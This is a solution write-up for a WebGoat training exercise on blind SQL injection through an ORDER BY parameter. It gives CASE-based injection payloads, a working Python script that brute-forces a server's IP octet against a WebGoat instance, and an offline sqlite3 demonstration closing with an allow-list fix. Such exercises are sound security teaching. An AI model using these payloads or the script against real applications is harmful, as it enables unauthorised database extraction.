SQL Injection Mitigation (10)

In this assignment, try to perform an SQL injection through the ORDER BY field. Try to find the IP address of the webgoat-prd server. Guessing the complete IP address might take too long, so we give you the last part: xxx.130.219.202

Note: The submit field of this assignment is NOT vulnerable to SQL injection.

Solution

⚠️ This lesson is buggy in the latest WebGoat version: a call to http://localhost:8080/WebGoat/SqlInjection/servers returns an error instead of the server list.

💡 Try sorting and look at the request
💡 Intercept the request and try to specify a different order by
💡 Use for example "(case when (true) then hostname else id end)" in the order by and see what happens

  • Clicking a column header sends a request to http://localhost:8080/WebGoat/SqlInjection/servers?column=ip. The column value goes straight into the ORDER BY clause, so it can be exploited by intercepting the request with the browser's developer tools (or a proxy) and supplying a crafted string as the column value.

  • To find the webgoat-prd IP address we first have to confirm the table name and the IP column name. The obvious guess is servers and ip. webgoat-acc is shown in the lesson with IP 192.168.3.3, so we use it as a known value: column=(CASE WHEN (SELECT ip FROM servers WHERE hostname='webgoat-acc') = '192.168.3.3' THEN id ELSE hostname END)

  • If the table and column names are correct, the subquery returns 192.168.3.3, the CASE evaluates to id, and the table is sorted by id. Otherwise the query either fails or sorts by hostname.

  • After intercepting and changing the request we get the table sorted by id, so the guess was correct.

  • To double-check the logic, send the same request with a non-existent table: column=(CASE WHEN (SELECT ip FROM whatever WHERE hostname='webgoat-acc') = '192.168.3.3' THEN id ELSE hostname END)

  • That returns an error page, which confirms the ORDER BY clause is evaluated without validation. The sort order now acts as a boolean oracle: a true condition sorts by id (first row id 1), a false one sorts by hostname (webgoat-acc comes first). Since the hint fixes the last three octets, only the first octet (0-255) has to be brute-forced, which is easy to script.

import requests

BASE_URL = 'http://host:port/WebGoat'  # replace host:port with your WebGoat instance
COOKIES = {'JSESSIONID': 'id'}          # replace with the JSESSIONID of your logged-in session


def sql_injection_mitigation_10():
    # Boolean-based blind injection through the ORDER BY column: when the guessed
    # first octet is right the sort key becomes id (first row has id '1'),
    # otherwise hostname (webgoat-acc, id '3', sorts first).
    for index in range(256):
        payload = ("(CASE WHEN (SELECT ip FROM servers WHERE hostname='webgoat-prd') "
                   "LIKE '{}.%' THEN id ELSE hostname END)").format(index)

        # Passing the payload via params lets requests URL-encode it (%, spaces, quotes).
        r = requests.get(BASE_URL + '/SqlInjection/servers',
                         params={'column': payload}, cookies=COOKIES)

        try:
            response = r.json()
        except ValueError:
            # Not JSON: WebGoat redirected to the login page, so the session cookie is wrong.
            print("Wrong JSESSIONID, find it by looking at your requests once logged in.")
            return

        if response[0]['id'] == '1':
            print('webgoat-prd IP: {}.130.219.202'.format(index))
            return

    print("No IP found")


if __name__ == '__main__':
    sql_injection_mitigation_10()
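The following is an added example, not code from the page or from WebGoat. It reproduces the ORDER BY oracle offline against a constructed sqlite3 stand-in for the servers table (the IPs are invented, except that webgoat-acc keeps 192.168.3.3 and webgoat-prd keeps the .130.219.202 suffix the lesson gives away), runs the same CASE-based blind extraction of the first octet against the vulnerable query, and shows the mitigation the lesson title refers to: because an ORDER BY column is an identifier, it cannot be bound as a parameter, so it has to be validated against an allow-list of column names. The function names `servers_vulnerable`, `servers_fixed` and `first_octet_blind` are assumptions for this example.

```python
import sqlite3

# Constructed stand-in for the lesson's servers table (IPs invented except the
# two values the lesson itself reveals).
SERVERS = [
    (1, "webgoat-dev", "192.168.3.1"),
    (2, "webgoat-tst", "192.168.3.2"),
    (3, "webgoat-acc", "192.168.3.3"),
    (4, "webgoat-pre-prod", "192.168.3.4"),
    (5, "webgoat-prd", "104.130.219.202"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE servers (id INTEGER, hostname TEXT, ip TEXT)")
    conn.executemany("INSERT INTO servers VALUES (?, ?, ?)", SERVERS)
    return conn


def servers_vulnerable(conn, column):
    # Mirrors the lesson's bug: the requested sort column is concatenated into
    # ORDER BY, so the client controls part of the SQL statement.
    sql = "SELECT id, hostname, ip FROM servers ORDER BY " + column
    return conn.execute(sql).fetchall()


ALLOWED_COLUMNS = {"id", "hostname", "ip"}


def servers_fixed(conn, column):
    # Mitigation: identifiers cannot be parameterised, so accept only known
    # column names and reject everything else before it reaches the query.
    if column not in ALLOWED_COLUMNS:
        raise ValueError("invalid sort column: %r" % column)
    sql = "SELECT id, hostname, ip FROM servers ORDER BY " + column
    return conn.execute(sql).fetchall()


def first_octet_blind(query, hostname="webgoat-prd"):
    # Boolean-based blind extraction. The CASE makes the sort key depend on the
    # secret: a correct guess sorts by id (first row id 1), a wrong one sorts by
    # hostname (webgoat-acc, id 3, comes first). '.' is literal in LIKE, so
    # '10.%' does not match '104.130...'.
    for octet in range(256):
        payload = ("(CASE WHEN (SELECT ip FROM servers WHERE hostname='{}') "
                   "LIKE '{}.%' THEN id ELSE hostname END)").format(hostname, octet)
        rows = query(payload)
        if rows[0][0] == 1:
            return octet
    return None


if __name__ == "__main__":
    db = make_db()
    octet = first_octet_blind(lambda col: servers_vulnerable(db, col))
    print("vulnerable endpoint leaks first octet:", octet)
    try:
        first_octet_blind(lambda col: servers_fixed(db, col))
    except ValueError as e:
        print("fixed endpoint rejects the payload:", e)
```

Running it recovers 104 from the vulnerable query after at most 256 sorts, while the allow-listed version raises on the first CASE payload. The allow-list belongs in the endpoint, not in the client: mapping a user-supplied name to one of a fixed set of column identifiers is the only safe way to make a sort column dynamic.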
